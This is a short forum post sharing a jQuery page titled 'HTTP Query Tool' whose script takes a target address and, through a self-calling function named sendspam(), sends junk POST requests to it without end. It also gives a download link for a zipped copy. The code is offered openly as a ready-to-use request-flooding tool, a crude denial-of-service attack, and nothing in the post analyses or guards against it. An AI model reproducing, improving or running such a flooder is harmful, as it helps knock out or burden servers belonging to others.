Write comments

jQuery http request bot/HTTP Query Tool

Wed 23. Sep 2020, 18:20

Code:
<html>
<head>
<title>HTTP Query Tool</title>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
</head>
<body>
<br><br><br>
<center>
<h3>Fill the IP...</h3>
<table>
<tr><td> IP : </td><td><input type="text" id="yourname" placeholder="http://127.0.0.1"></td></tr>
<tr><td></td><td><input type="submit" name="send" value="Send!" style="width: 100%" onclick="sendspam()">
<script>
function sendspam() {
var yourname = document.getElementById("yourname").value;
if (yourname == "") {alert('Type something!');return false;}
var dataString = "crap";
$.ajax({type: "POST", url: ""+yourname+"", data: dataString, cache: false,});
sendspam();
}
</script>


Download: (HTTP Query Tool zipped)
https://uploadrar.com/cyjk8uhjziec

Wed 23. Sep 2020, 18:20

Write comments




Bei iphpbb3.com bekommen Sie ein kostenloses Forum mit vielen tollen Extras
Forum kostenlos einrichten - Hot Topics - Tags
Beliebteste Themen: Web, Name, Rap, USA, Forum

Impressum | Datenschutz